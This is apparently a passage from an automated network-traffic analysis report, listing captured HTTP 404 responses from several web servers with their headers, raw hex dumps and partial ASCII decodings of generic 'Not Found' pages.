34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:55:34 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:55:37 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:57:02 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ro8%2BRdHQnVliNe7E5davoxQTs2cygGkkW9VFtFoOHfMhs8cUYRTOd2FRiLEzR2vOuZFGqLFUprke5iUZuh8pBPwTtJ1JkCtkeZiTDPAal%2FREEjgyvJMsdBNw2BT1GGSyxwzbUJUyWg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff59ee708b262d6-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=119019&min_rtt=119019&rtt_var=59509&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=811&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff 0d 0a Data Ascii: d8Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0|YC6$/]_
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:57:04 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WJO2FK9AJGTkAq99G%2Bdjq3Vc6cxrXhB42WFqvbhE%2FKlJ4a8w6zEPZf385%2BNpegU5X6Zhz%2FKLFEvlkcBqWt1L9RF72xBetg%2FLwZFAecHD23i%2BaCY5DCPjOYXo4IUl0pfkGdzzVHw9yg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff59ef79e5810ed-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=118653&min_rtt=118653&rtt_var=59326&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=831&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:57:07 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O4WYtCaLEnUX2VSFNq%2FqIwxr%2FeBLm8p6A2l8ta%2B%2FdYaAUOTCSygldZ%2B52CBVVBLmPxtND1Gd2YpygCyX%2FAHRf5fviTFOnUbf1OWkETVoqvdYbbirkwGf6qH5gaj97YSuHFRCOW5hYw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff59f082da1874f-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=118836&min_rtt=118836&rtt_var=59418&sent=2&recv=6&lost=0&retrans=0&sent_bytes=0&recv_bytes=3948&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff 0d 0a Data Ascii: d8Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0|YC6$/]_
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:57:10 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dCoKElnvZjL8eD3iYDX9OYPTFhsb14hFxTPkx%2BbLOw9KH5IsIzakScLCZd90t2O0akzI26K5JKnnGybcP8WLlCqDSUKk2XIyYIX0m9W2rRXNFHmakYfy9ZCm2C%2BGFl%2B7jfdUZGXihQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff59f18cd10a49b-ORDalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=119224&min_rtt=119224&rtt_var=59612&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=539&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 75 79 73 70 65 65 63 68 73 74 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.buyspeechst.shop Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:57:16 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:57:19 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:57:22 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:57:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tQAztm%2Busp1qpHvsfHfUeQwzc%2BafZQwG06p1eq8mBC4xyYIQJfAJ4ThgRrm%2FdwRG%2FMn5NfemRFQF3LcW7naKbWG1FdOVeJREGAgxB9ofgZmxJabJc1qIVnc%2BHP0JK7I5U2Y8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff5a023581ee269-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=119349&min_rtt=119349&rtt_var=59674&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=799&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:57:55 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8%2BVEtQ15KiJojdThOkBwjCnxmg%2FDDUgvIUVzUVGpFxZIW18r61XTVZF0rX%2BoGg3Bh%2F5JM8mfIcn%2FUEGHb6xalBxmM9i8QzT1rOIybO%2F77fIRQjTusn3HMcmFOhRmnA%2FogHEz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff5a033eda6233a-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=119336&min_rtt=119336&rtt_var=59668&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=819&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:57:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DnnF83MshvNWhunqlYjFBVtSSDHeezi9y%2FfglLtwhYbufnIIrSg9HZsg9z04dXexydWa07AfZxi8WZv2zilxPTF2Xf7ZaaufoPn8PHRc2ql4bQaoR%2FMHY7OjlU11TTd8OrPQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff5a0448a6a10ed-ORDContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=118564&min_rtt=118564&rtt_var=59282&sent=3&recv=6&lost=0&retrans=0&sent_bytes=0&recv_bytes=3936&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:58:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kwE%2BxxjkBYKmn%2FLrgRASdSOP2JOWtsaIhHx7j8%2FGqIIdLoEVSqLZ2V46eevsA7lCP8j0G67TTIC9gRTIwQL8TB%2FHQ0CAkZAJWJfRPL0In0yZxGWstAsIG95aubTuckrO6%2BKp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ff5a0552864e269-ORDalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=119652&min_rtt=119652&rtt_var=59826&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=535&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:58:06 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 